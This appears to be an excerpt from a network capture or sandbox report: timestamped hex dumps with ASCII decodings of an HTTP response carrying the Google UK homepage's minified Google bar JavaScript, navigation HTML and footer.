                                  Data Ascii: ms,"https://apis.google.com");G.m=F(G.m,"");G.l=F(G.l,[]);G.dpo=F(G.dpo,"");xa||w.push(["gl",{url:"//ssl.gstatic.com/gb/js/abc/glm_e7bb39a7e1a24581ff4f8d199678b1b9.js"}]);var Ea={pu:ya,sh:"",si:za,hl:"en"};v.gl=Ea;wa?Aa.load||p("load",Ba,Aa):p("load",Ba,A
                                  2021-09-14 19:48:21 UTC24INData Raw: 63 3d 61 2e 63 6c 61 73 73 4e 61 6d 65 3b 62 3d 6e 65 77 20 52 65 67 45 78 70 28 22 5c 5c 73 3f 5c 5c 62 22 2b 62 2b 22 5c 5c 62 22 29 3b 63 26 26 63 2e 6d 61 74 63 68 28 62 29 26 26 28 61 2e 63 6c 61 73 73 4e 61 6d 65 3d 63 2e 72 65 70 6c 61 63 65 28 62 2c 22 22 29 29 7d 2c 48 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 62 3d 6e 65 77 20 52 65 67 45 78 70 28 22 5c 5c 62 22 2b 62 2b 22 5c 5c 62 22 29 3b 61 3d 61 2e 63 6c 61 73 73 4e 61 6d 65 3b 72 65 74 75 72 6e 21 28 21 61 7c 7c 21 61 2e 6d 61 74 63 68 28 62 29 29 7d 2c 4c 61 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 48 28 61 2c 62 29 3f 4b 28 61 2c 62 29 3a 4a 28 61 2c 62 29 7d 2c 4d 61 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 61 5b 62 5d 3d 66 75 6e 63 74 69 6f 6e 28 63 29 7b 76 61 72 20 64 3d
                                  Data Ascii: c=a.className;b=new RegExp("\\s?\\b"+b+"\\b");c&&c.match(b)&&(a.className=c.replace(b,""))},H=function(a,b){b=new RegExp("\\b"+b+"\\b");a=a.className;return!(!a||!a.match(b))},La=function(a,b){H(a,b)?K(a,b):J(a,b)},Ma=function(a,b){a[b]=function(c){var d=
                                  2021-09-14 19:48:21 UTC25INData Raw: 7b 7d 2c 4f 3d 76 6f 69 64 20 30 2c 62 62 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 74 72 79 7b 76 61 72 20 63 3d 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 67 62 22 29 3b 4a 28 63 2c 22 67 62 70 64 6a 73 22 29 3b 50 28 29 3b 59 61 28 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 67 62 22 29 29 26 26 4a 28 63 2c 22 67 62 72 74 6c 22 29 3b 69 66 28 62 26 26 62 2e 67 65 74 41 74 74 72 69 62 75 74 65 29 7b 76 61 72 20 64 3d 62 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 22 61 72 69 61 2d 6f 77 6e 73 22 29 3b 69 66 28 64 2e 6c 65 6e 67 74 68 29 7b 76 61 72 20 66 3d 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 64 29 3b 69 66 28 66 29 7b 76 61 72 20 6b 3d 62 2e 70 61 72 65
                                  Data Ascii: {},O=void 0,bb=function(a,b){try{var c=document.getElementById("gb");J(c,"gbpdjs");P();Ya(document.getElementById("gb"))&&J(c,"gbrtl");if(b&&b.getAttribute){var d=b.getAttribute("aria-owns");if(d.length){var f=document.getElementById(d);if(f){var k=b.pare
                                  2021-09-14 19:48:21 UTC27INData Raw: 72 65 61 6b 7d 7d 69 66 28 66 29 7b 69 66 28 64 2b 31 3c 6b 2e 63 68 69 6c 64 4e 6f 64 65 73 2e 6c 65 6e 67 74 68 29 7b 76 61 72 20 56 3d 6b 2e 63 68 69 6c 64 4e 6f 64 65 73 5b 64 2b 31 5d 3b 48 28 56 2e 66 69 72 73 74 43 68 69 6c 64 2c 22 67 62 6d 68 22 29 7c 7c 65 62 28 56 2c 45 29 7c 7c 28 6c 3d 64 2b 31 29 7d 65 6c 73 65 20 69 66 28 30 3c 3d 64 2d 31 29 7b 76 61 72 20 57 3d 6b 2e 63 68 69 6c 64 4e 6f 64 65 73 5b 64 2d 31 5d 3b 48 28 57 2e 66 69 72 73 74 43 68 69 6c 64 2c 22 67 62 6d 68 22 29 7c 7c 65 62 28 57 2c 45 29 7c 7c 28 6c 3d 64 29 7d 62 72 65 61 6b 7d 30 3c 64 26 26 64 2b 31 3c 6e 26 26 64 2b 2b 7d 69 66 28 30 3c 3d 6c 29 7b 76 61 72 20 79 3d 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 6c 69 22 29 2c 7a 3d 64 6f 63
                                  Data Ascii: reak}}if(f){if(d+1<k.childNodes.length){var V=k.childNodes[d+1];H(V.firstChild,"gbmh")||eb(V,E)||(l=d+1)}else if(0<=d-1){var W=k.childNodes[d-1];H(W.firstChild,"gbmh")||eb(W,E)||(l=d)}break}0<d&&d+1<n&&d++}if(0<=l){var y=document.createElement("li"),z=doc
                                  2021-09-14 19:48:21 UTC28INData Raw: 72 72 65 6e 74 6c 79 20 75 6e 61 76 61 69 6c 61 62 6c 65 2e 25 31 24 73 50 6c 65 61 73 65 20 74 72 79 20 61 67 61 69 6e 20 6c 61 74 65 72 2e 22 2c 22 25 31 24 73 22 29 2c 51 28 62 2c 21 30 29 29 7d 63 61 74 63 68 28 63 29 7b 72 28 63 2c 22 73 62 22 2c 22 73 64 68 65 22 29 7d 7d 2c 71 62 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 63 29 7b 69 66 28 61 26 26 62 29 7b 76 61 72 20 64 3d 5a 61 28 61 29 3b 69 66 28 64 29 7b 69 66 28 63 29 7b 64 2e 74 65 78 74 43 6f 6e 74 65 6e 74 3d 22 22 3b 62 3d 62 2e 73 70 6c 69 74 28 63 29 3b 63 3d 30 3b 66 6f 72 28 76 61 72 20 66 3b 66 3d 62 5b 63 5d 3b 63 2b 2b 29 7b 76 61 72 20 6b 3d 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 64 69 76 22 29 3b 0a 6b 2e 69 6e 6e 65 72 48 54 4d 4c 3d 66 3b 64 2e
                                  Data Ascii: rrently unavailable.%1$sPlease try again later.","%1$s"),Q(b,!0))}catch(c){r(c,"sb","sdhe")}},qb=function(a,b,c){if(a&&b){var d=Za(a);if(d){if(c){d.textContent="";b=b.split(c);c=0;for(var f;f=b[c];c++){var k=document.createElement("div");k.innerHTML=f;d.
                                  2021-09-14 19:48:21 UTC29INData Raw: 30 30 22 2c 30 29 2c 74 68 6f 3a 68 2e 63 28 22 35 30 30 30 22 2c 30 29 2c 74 65 74 3a 68 2e 62 28 22 30 2e 35 22 2c 30 29 7d 3b 76 2e 77 6d 3d 79 62 3b 69 66 28 68 2e 61 28 22 31 22 29 29 7b 76 61 72 20 7a 62 3d 68 2e 61 28 22 22 29 3b 77 2e 70 75 73 68 28 5b 22 67 63 22 2c 7b 61 75 74 6f 3a 7a 62 2c 75 72 6c 3a 22 2f 2f 73 73 6c 2e 67 73 74 61 74 69 63 2e 63 6f 6d 2f 67 62 2f 6a 73 2f 61 62 63 2f 67 63 69 5f 39 31 66 33 30 37 35 35 64 36 61 36 62 37 38 37 64 63 63 32 61 34 30 36 32 65 36 65 39 38 32 34 2e 6a 73 22 2c 6c 69 62 73 3a 22 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6c 69 65 6e 74 3a 67 61 70 69 2e 69 66 72 61 6d 65 73 22 7d 5d 29 3b 76 61 72 20 41 62 3d 7b 76 65 72 73 69 6f 6e 3a 22 67 63 69 5f 39 31 66 33 30 37 35 35 64 36 61 36 62 37 38 37 64 63
                                  Data Ascii: 00",0),tho:h.c("5000",0),tet:h.b("0.5",0)};v.wm=yb;if(h.a("1")){var zb=h.a("");w.push(["gc",{auto:zb,url:"//ssl.gstatic.com/gb/js/abc/gci_91f30755d6a6b787dcc2a4062e6e9824.js",libs:"googleapis.client:gapi.iframes"}]);var Ab={version:"gci_91f30755d6a6b787dc
                                  2021-09-14 19:48:21 UTC30INData Raw: 3d 4d 62 3b 76 61 72 20 66 3d 61 3b 69 66 28 21 52 29 7b 52 3d 7b 7d 3b 66 6f 72 28 76 61 72 20 6b 3d 30 3b 6b 3c 4a 62 2e 6c 65 6e 67 74 68 3b 6b 2b 2b 29 7b 76 61 72 20 6d 3d 4a 62 5b 6b 5d 3b 52 5b 6d 5d 3d 21 30 7d 7d 69 66 28 66 3d 21 21 52 5b 66 5d 29 63 3d 4c 62 2c 64 3d 4e 62 3b 69 66 28 64 29 7b 64 3d 65 6e 63 6f 64 65 55 52 49 43 6f 6d 70 6f 6e 65 6e 74 3b 69 66 28 67 2e 72 70 29 7b 76 61 72 20 6e 3d 67 2e 72 70 28 29 3b 6e 3d 22 2d 31 22 21 3d 6e 3f 6e 3a 22 22 7d 65 6c 73 65 20 6e 3d 22 22 3b 66 3d 28 6e 65 77 20 44 61 74 65 29 2e 67 65 74 54 69 6d 65 28 29 3b 6b 3d 64 28 22 32 38 38 33 34 22 29 3b 6d 3d 64 28 22 68 66 78 41 59 63 32 48 47 4a 48 57 7a 37 73 50 69 4e 61 34 6f 41 4d 22 29 3b 76 61 72 20 6c 3d 67 2e 62 76 2e 66 2c 71 3d 64 28 22
                                  Data Ascii: =Mb;var f=a;if(!R){R={};for(var k=0;k<Jb.length;k++){var m=Jb[k];R[m]=!0}}if(f=!!R[f])c=Lb,d=Nb;if(d){d=encodeURIComponent;if(g.rp){var n=g.rp();n="-1"!=n?n:""}else n="";f=(new Date).getTime();k=d("28834");m=d("hfxAYc2HGJHWz7sPiNa4oAM");var l=g.bv.f,q=d("
                                  2021-09-14 19:48:21 UTC32INData Raw: 74 65 6e 74 2e 63 6f 6d 2f 6f 67 77 2f 64 65 66 61 75 6c 74 2d 75 73 65 72 3d 73 32 34 22 2c 22 32 37 22 3a 22 68 74 74 70 73 3a 2f 2f 6c 68 33 2e 67 6f 6f 67 6c 65 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 6f 6d 2f 6f 67 77 2f 64 65 66 61 75 6c 74 2d 75 73 65 72 3d 73 32 34 22 7d 2c 59 62 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 28 61 3d 58 62 5b 61 5d 29 7c 7c 22 68 74 74 70 73 3a 2f 2f 6c 68 33 2e 67 6f 6f 67 6c 65 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 6f 6d 2f 6f 67 77 2f 64 65 66 61 75 6c 74 2d 75 73 65 72 3d 73 32 34 22 7d 2c 0a 5a 62 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 42 28 66 75 6e 63 74 69 6f 6e 28 29 7b 67 2e 73 70 64 28 29 7d 29 7d 3b 70 28 22 73 70 6e 22 2c 55 62 29 3b 70 28 22 73 70 70 22 2c 57 62 29 3b 70 28 22 73 70 73 22 2c
                                  Data Ascii: tent.com/ogw/default-user=s24","27":"https://lh3.googleusercontent.com/ogw/default-user=s24"},Yb=function(a){return(a=Xb[a])||"https://lh3.googleusercontent.com/ogw/default-user=s24"},Zb=function(){B(function(){g.spd()})};p("spn",Ub);p("spp",Wb);p("sps",
                                  2021-09-14 19:48:21 UTC33INData Raw: 7d 63 61 74 63 68 28 64 29 7b 72 28 64 2c 22 75 70 22 2c 22 74 70 22 29 7d 7d 7d 63 61 74 63 68 28 64 29 7b 72 28 64 2c 22 75 70 22 2c 22 6d 74 70 22 29 7d 7d 2c 64 63 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 69 66 28 59 28 5b 32 5d 2c 22 73 73 70 22 29 29 7b 76 61 72 20 62 3d 21 61 63 5b 61 5d 3b 54 26 26 28 62 3d 62 26 26 21 21 54 5b 61 5d 29 3b 72 65 74 75 72 6e 20 62 7d 7d 3b 62 63 3d 21 31 3b 53 3d 7b 7d 3b 61 63 3d 7b 7d 3b 54 3d 6e 75 6c 6c 3b 58 3d 31 3b 0a 76 61 72 20 69 63 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 76 61 72 20 62 3d 21 31 3b 74 72 79 7b 62 3d 61 2e 63 6f 6f 6b 69 65 26 26 61 2e 63 6f 6f 6b 69 65 2e 6d 61 74 63 68 28 22 50 52 45 46 22 29 7d 63 61 74 63 68 28 63 29 7b 7d 72 65 74 75 72 6e 21 62 7d 2c 6a 63 3d 66 75 6e 63 74 69 6f 6e 28
                                  Data Ascii: }catch(d){r(d,"up","tp")}}}catch(d){r(d,"up","mtp")}},dc=function(a){if(Y([2],"ssp")){var b=!ac[a];T&&(b=b&&!!T[a]);return b}};bc=!1;S={};ac={};T=null;X=1;var ic=function(a){var b=!1;try{b=a.cookie&&a.cookie.match("PREF")}catch(c){}return!b},jc=function(
                                  2021-09-14 19:48:21 UTC34INData Raw: 70 22 2c 7b 72 3a 65 63 2c 6e 61 70 3a 66 63 2c 61 6f 70 3a 67 63 2c 74 70 3a 68 63 2c 73 73 70 3a 64 63 2c 73 70 64 3a 6c 63 2c 67 70 64 3a 6d 63 2c 61 65 68 3a 6e 63 2c 61 61 6c 3a 6f 63 2c 67 63 63 3a 70 63 7d 29 3b 76 61 72 20 5a 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 61 5b 62 5d 3d 66 75 6e 63 74 69 6f 6e 28 63 29 7b 76 61 72 20 64 3d 61 72 67 75 6d 65 6e 74 73 3b 67 2e 71 6d 28 66 75 6e 63 74 69 6f 6e 28 29 7b 61 5b 62 5d 2e 61 70 70 6c 79 28 74 68 69 73 2c 64 29 7d 29 7d 7d 3b 5a 28 67 2e 75 70 2c 22 73 6c 22 29 3b 5a 28 67 2e 75 70 2c 22 73 69 22 29 3b 5a 28 67 2e 75 70 2c 22 73 70 6c 22 29 3b 5a 28 67 2e 75 70 2c 22 64 70 63 22 29 3b 5a 28 67 2e 75 70 2c 22 69 69 63 22 29 3b 67 2e 6d 63 66 28 22 75 70 22 2c 7b 73 70 3a 68 2e 62 28 22 30 2e
                                  Data Ascii: p",{r:ec,nap:fc,aop:gc,tp:hc,ssp:dc,spd:lc,gpd:mc,aeh:nc,aal:oc,gcc:pc});var Z=function(a,b){a[b]=function(c){var d=arguments;g.qm(function(){a[b].apply(this,d)})}};Z(g.up,"sl");Z(g.up,"si");Z(g.up,"spl");Z(g.up,"dpc");Z(g.up,"iic");g.mcf("up",{sp:h.b("0.
                                  2021-09-14 19:48:21 UTC36INData Raw: 74 72 79 7b 2f 2a 0a 0a 20 43 6f 70 79 72 69 67 68 74 20 54 68 65 20 43 6c 6f 73 75 72 65 20 4c 69 62 72 61 72 79 20 41 75 74 68 6f 72 73 2e 0a 20 53 50 44 58 2d 4c 69 63 65 6e 73 65 2d 49 64 65 6e 74 69 66 69 65 72 3a 20 41 70 61 63 68 65 2d 32 2e 30 0a 2a 2f 0a 76 61 72 20 61 3d 77 69 6e 64 6f 77 2e 67 62 61 72 3b 61 2e 6d 63 66 28 22 6d 6d 22 2c 7b 73 3a 22 31 22 7d 29 3b 7d 63 61 74 63 68 28 65 29 7b 77 69 6e 64 6f 77 2e 67 62 61 72 26 26 67 62 61 72 2e 6c 6f 67 67 65 72 26 26 67 62 61 72 2e 6c 6f 67 67 65 72 2e 6d 6c 28 65 2c 7b 22 5f 73 6e 22 3a 22 63 66 67 2e 69 6e 69 74 22 7d 29 3b 7d 7d 29 28 29 3b 0a 28 66 75 6e 63 74 69 6f 6e 28 29 7b 74 72 79 7b 2f 2a 0a 0a 20 43 6f 70 79 72 69 67 68 74 20 54 68 65 20 43 6c 6f 73 75 72 65 20 4c 69 62 72 61 72
                                  Data Ascii: try{/* Copyright The Closure Library Authors. SPDX-License-Identifier: Apache-2.0*/var a=window.gbar;a.mcf("mm",{s:"1"});}catch(e){window.gbar&&gbar.logger&&gbar.logger.ml(e,{"_sn":"cfg.init"});}})();(function(){try{/* Copyright The Closure Librar
                                  2021-09-14 19:48:21 UTC37INData Raw: 22 29 2c 65 6c 65 3a 64 28 22 31 22 29 2c 65 73 72 3a 65 28 22 30 2e 31 22 29 2c 65 76 74 73 3a 5b 22 6d 6f 75 73 65 64 6f 77 6e 22 2c 22 74 6f 75 63 68 73 74 61 72 74 22 2c 22 74 6f 75 63 68 6d 6f 76 65 22 2c 22 77 68 65 65 6c 22 2c 22 6b 65 79 64 6f 77 6e 22 5d 2c 67 62 6c 3a 22 65 73 5f 70 6c 75 73 6f 6e 65 5f 67 63 5f 32 30 32 31 30 38 30 33 2e 30 5f 70 31 22 2c 68 64 3a 22 63 6f 6d 22 2c 68 6c 3a 22 65 6e 22 2c 69 72 70 3a 64 28 22 22 29 2c 70 69 64 3a 65 28 22 31 22 29 2c 0a 73 6e 69 64 3a 65 28 22 32 38 38 33 34 22 29 2c 74 6f 3a 65 28 22 33 30 30 30 30 30 22 29 2c 75 3a 65 28 22 22 29 2c 76 66 3a 22 2e 36 36 2e 22 7d 2c 67 3d 66 2c 68 3d 5b 22 62 6e 64 63 66 67 22 5d 2c 6b 3d 61 3b 68 5b 30 5d 69 6e 20 6b 7c 7c 22 75 6e 64 65 66 69 6e 65 64 22 3d
                                  Data Ascii: "),ele:d("1"),esr:e("0.1"),evts:["mousedown","touchstart","touchmove","wheel","keydown"],gbl:"es_plusone_gc_20210803.0_p1",hd:"com",hl:"en",irp:d(""),pid:e("1"),snid:e("28834"),to:e("300000"),u:e(""),vf:".66."},g=f,h=["bndcfg"],k=a;h[0]in k||"undefined"=
                                  2021-09-14 19:48:21 UTC38INData Raw: 77 22 3e 3c 73 70 61 6e 20 63 6c 61 73 73 3d 67 62 74 62 32 3e 3c 2f 73 70 61 6e 3e 3c 73 70 61 6e 20 63 6c 61 73 73 3d 67 62 74 73 3e 53 65 61 72 63 68 3c 2f 73 70 61 6e 3e 3c 2f 61 3e 3c 2f 6c 69 3e 3c 6c 69 20 63 6c 61 73 73 3d 67 62 74 3e 3c 61 20 63 6c 61 73 73 3d 67 62 7a 74 20 69 64 3d 67 62 5f 32 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 2e 75 6b 2f 69 6d 67 68 70 3f 68 6c 3d 65 6e 26 74 61 62 3d 77 69 22 3e 3c 73 70 61 6e 20 63 6c 61 73 73 3d 67 62 74 62 32 3e 3c 2f 73 70 61 6e 3e 3c 73 70 61 6e 20 63 6c 61 73 73 3d 67 62 74 73 3e 49 6d 61 67 65 73 3c 2f 73 70 61 6e 3e 3c 2f 61 3e 3c 2f 6c 69 3e 3c 6c 69 20 63 6c 61 73 73 3d 67 62 74 3e 3c 61 20 63 6c 61 73 73 3d 67 62 7a 74 20 69 64 3d 67 62 5f 38 20 68
                                  Data Ascii: w"><span class=gbtb2></span><span class=gbts>Search</span></a></li><li class=gbt><a class=gbzt id=gb_2 href="https://www.google.co.uk/imghp?hl=en&tab=wi"><span class=gbtb2></span><span class=gbts>Images</span></a></li><li class=gbt><a class=gbzt id=gb_8 h
                                  2021-09-14 19:48:21 UTC39INData Raw: 70 61 6e 20 63 6c 61 73 73 3d 67 62 6d 61 3e 3c 2f 73 70 61 6e 3e 3c 2f 73 70 61 6e 3e 3c 2f 61 3e 3c 73 63 72 69 70 74 20 6e 6f 6e 63 65 3d 27 32 30 31 62 48 70 69 53 36 57 4b 65 58 69 2f 48 52 72 34 79 78 41 3d 3d 27 3e 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 27 67 62 7a 74 6d 27 29 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 27 63 6c 69 63 6b 27 2c 20 66 75 6e 63 74 69 6f 6e 20 63 6c 69 63 6b 48 61 6e 64 6c 65 72 28 29 20 7b 20 67 62 61 72 2e 74 67 28 65 76 65 6e 74 2c 74 68 69 73 29 3b 20 7d 29 3b 3c 2f 73 63 72 69 70 74 3e 3c 64 69 76 20 63 6c 61 73 73 3d 67 62 6d 20 69 64 3d 67 62 64 20 61 72 69 61 2d 6f 77 6e 65 72 3d 67 62 7a 74 6d 3e 3c 64 69 76 20 69 64 3d 67 62 6d 6d 62 20 63 6c 61 73 73 3d 22 67 62 6d
                                  Data Ascii: pan class=gbma></span></span></a><script nonce='201bHpiS6WKeXi/HRr4yxA=='>document.getElementById('gbztm').addEventListener('click', function clickHandler() { gbar.tg(event,this); });</script><div class=gbm id=gbd aria-owner=gbztm><div id=gbmmb class="gbm
                                  2021-09-14 19:48:21 UTC41INData Raw: 6c 61 73 73 3d 67 62 6d 74 63 3e 3c 61 20 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 2e 75 6b 2f 69 6e 74 6c 2f 65 6e 2f 61 62 6f 75 74 2f 70 72 6f 64 75 63 74 73 3f 74 61 62 3d 77 68 22 20 63 6c 61 73 73 3d 67 62 6d 74 3e 45 76 65 6e 20 6d 6f 72 65 20 26 72 61 71 75 6f 3b 3c 2f 61 3e 3c 73 63 72 69 70 74 20 6e 6f 6e 63 65 3d 27 32 30 31 62 48 70 69 53 36 57 4b 65 58 69 2f 48 52 72 34 79 78 41 3d 3d 27 3e 64 6f 63 75 6d 65 6e 74 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 28 27 6c 69 20 3e 20 61 2e 67 62 6d 74 27 29 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 27 63 6c 69 63 6b 27 2c 20 66 75 6e 63 74 69 6f 6e 20 63 6c 69 63 6b 48 61 6e 64 6c 65 72 28 29 20 7b 20 67 62 61 72 2e 6c 6f 67 67 65 72 2e 69 6c 28
                                  Data Ascii: lass=gbmtc><a href="https://www.google.co.uk/intl/en/about/products?tab=wh" class=gbmt>Even more &raquo;</a><script nonce='201bHpiS6WKeXi/HRr4yxA=='>document.querySelector('li > a.gbmt').addEventListener('click', function clickHandler() { gbar.logger.il(
                                  2021-09-14 19:48:21 UTC42INData Raw: 68 6c 3d 65 6e 22 3e 53 65 61 72 63 68 20 73 65 74 74 69 6e 67 73 3c 2f 61 3e 3c 2f 6c 69 3e 3c 6c 69 20 63 6c 61 73 73 3d 67 62 6d 74 63 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 62 6d 74 20 67 62 6d 68 22 3e 3c 2f 64 69 76 3e 3c 2f 6c 69 3e 3c 6c 69 20 63 6c 61 73 73 3d 22 67 62 6b 70 20 67 62 6d 74 63 22 3e 3c 61 20 63 6c 61 73 73 3d 67 62 6d 74 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 2e 75 6b 2f 68 69 73 74 6f 72 79 2f 6f 70 74 6f 75 74 3f 68 6c 3d 65 6e 22 3e 57 65 62 20 48 69 73 74 6f 72 79 3c 2f 61 3e 3c 2f 6c 69 3e 3c 2f 6f 6c 3e 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 6c 69 3e 3c 2f 6f 6c 3e 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 69 64 3d 67 62 78 33 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 69 64
                                  Data Ascii: hl=en">Search settings</a></li><li class=gbmtc><div class="gbmt gbmh"></div></li><li class="gbkp gbmtc"><a class=gbmt href="http://www.google.co.uk/history/optout?hl=en">Web History</a></li></ol></div></div></li></ol></div></div><div id=gbx3></div><div id
                                  2021-09-14 19:48:21 UTC43INData Raw: 3c 2f 73 70 61 6e 3e 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 64 73 22 3e 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 6c 73 62 62 22 3e 3c 69 6e 70 75 74 20 63 6c 61 73 73 3d 22 6c 73 62 22 20 69 64 3d 22 74 73 75 69 64 31 22 20 76 61 6c 75 65 3d 22 49 27 6d 20 46 65 65 6c 69 6e 67 20 4c 75 63 6b 79 22 20 6e 61 6d 65 3d 22 62 74 6e 49 22 20 74 79 70 65 3d 22 73 75 62 6d 69 74 22 3e 3c 73 63 72 69 70 74 20 6e 6f 6e 63 65 3d 22 32 30 31 62 48 70 69 53 36 57 4b 65 58 69 2f 48 52 72 34 79 78 41 3d 3d 22 3e 28 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 69 64 3d 27 74 73 75 69 64 31 27 3b 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 69 64 29 2e 6f 6e 63 6c 69 63 6b 20 3d 20 66 75 6e 63 74 69 6f 6e 28 29 7b 69 66 20 28 74 68 69 73 2e 66 6f
                                  Data Ascii: </span><span class="ds"><span class="lsbb"><input class="lsb" id="tsuid1" value="I'm Feeling Lucky" name="btnI" type="submit"><script nonce="201bHpiS6WKeXi/HRr4yxA==">(function(){var id='tsuid1';document.getElementById(id).onclick = function(){if (this.fo
                                  2021-09-14 19:48:21 UTC44INData Raw: 72 3e 3c 2f 64 69 76 3e 3c 73 70 61 6e 20 69 64 3d 22 66 6f 6f 74 65 72 22 3e 3c 64 69 76 20 73 74 79 6c 65 3d 22 66 6f 6e 74 2d 73 69 7a 65 3a 31 30 70 74 22 3e 3c 64 69 76 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 31 39 70 78 20 61 75 74 6f 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 22 20 69 64 3d 22 57 71 51 41 4e 62 22 3e 3c 61 20 68 72 65 66 3d 22 2f 69 6e 74 6c 2f 65 6e 2f 61 64 73 2f 22 3e 41 64 76 65 72 74 69 73 69 6e 67 a0 50 72 6f 67 72 61 6d 6d 65 73 3c 2f 61 3e 3c 61 20 68 72 65 66 3d 22 2f 73 65 72 76 69 63 65 73 2f 22 3e 42 75 73 69 6e 65 73 73 20 53 6f 6c 75 74 69 6f 6e 73 3c 2f 61 3e 3c 61 20 68 72 65 66 3d 22 2f 69 6e 74 6c 2f 65 6e 2f 61 62 6f 75 74 2e 68 74 6d 6c 22 3e 41 62 6f 75 74 20 47 6f 6f 67 6c 65 3c 2f 61 3e 3c 61
                                  Data Ascii: r></div><span id="footer"><div style="font-size:10pt"><div style="margin:19px auto;text-align:center" id="WqQANb"><a href="/intl/en/ads/">AdvertisingProgrammes</a><a href="/services/">Business Solutions</a><a href="/intl/en/about.html">About Google</a><a
                                  2021-09-14 19:48:21 UTC46INData Raw: 69 73 7c 7c 73 65 6c 66 2c 66 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 20 61 7d 3b 76 61 72 20 67 3b 76 61 72 20 6c 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 74 68 69 73 2e 67 3d 62 3d 3d 3d 68 3f 61 3a 22 22 7d 3b 6c 2e 70 72 6f 74 6f 74 79 70 65 2e 74 6f 53 74 72 69 6e 67 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 67 2b 22 22 7d 3b 76 61 72 20 68 3d 7b 7d 3b 66 75 6e 63 74 69 6f 6e 20 6d 28 29 7b 76 61 72 20 61 3d 75 3b 67 6f 6f 67 6c 65 2e 6c 78 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 6e 28 61 29 3b 67 6f 6f 67 6c 65 2e 6c 78 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 7d 7d 3b 67 6f 6f 67 6c 65 2e 62 78 7c 7c 67 6f 6f 67 6c 65 2e 6c 78 28 29 7d 0a 66 75 6e 63 74 69 6f 6e 20 6e 28 61 29 7b 67 6f 6f 67 6c 65 2e 74 69
                                  Data Ascii: is||self,f=function(a){return a};var g;var l=function(a,b){this.g=b===h?a:""};l.prototype.toString=function(){return this.g+""};var h={};function m(){var a=u;google.lx=function(){n(a);google.lx=function(){}};google.bx||google.lx()}function n(a){google.ti
                                  2021-09-14 19:48:21 UTC47INData Raw: 3d 7b 61 74 74 6e 3a 66 61 6c 73 65 2c 62 6c 74 3a 27 6e 6f 6e 65 27 2c 63 68 6e 6b 3a 30 2c 64 77 3a 66 61 6c 73 65 2c 65 6d 74 6e 3a 30 2c 65 6e 64 3a 30 2c 69 6e 65 3a 66 61 6c 73 65 2c 6c 6c 73 3a 27 64 65 66 61 75 6c 74 27 2c 70 64 74 3a 30 2c 72 65 70 3a 30 2c 73 69 66 3a 74 72 75 65 2c 73 6e 65 74 3a 74 72 75 65 2c 73 74 72 74 3a 30 2c 75 62 6d 3a 66 61 6c 73 65 2c 75 77 70 3a 74 72 75 65 7d 3b 7d 29 28 29 3b 28 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 70 6d 63 3d 27 7b 5c 78 32 32 64 5c 78 32 32 3a 7b 7d 2c 5c 78 32 32 73 62 5f 68 65 5c 78 32 32 3a 7b 5c 78 32 32 61 67 65 6e 5c 78 32 32 3a 74 72 75 65 2c 5c 78 32 32 63 67 65 6e 5c 78 32 32 3a 74 72 75 65 2c 5c 78 32 32 63 6c 69 65 6e 74 5c 78 32 32 3a 5c 78 32 32 68 65 69 72 6c 6f 6f 6d 2d 68
                                  Data Ascii: ={attn:false,blt:'none',chnk:0,dw:false,emtn:0,end:0,ine:false,lls:'default',pdt:0,rep:0,sif:true,snet:true,strt:0,ubm:false,uwp:true};})();(function(){var pmc='{\x22d\x22:{},\x22sb_he\x22:{\x22agen\x22:true,\x22cgen\x22:true,\x22client\x22:\x22heirloom-h
                                  2021-09-14 19:48:21 UTC48INData Raw: 30 0d 0a 0d 0a
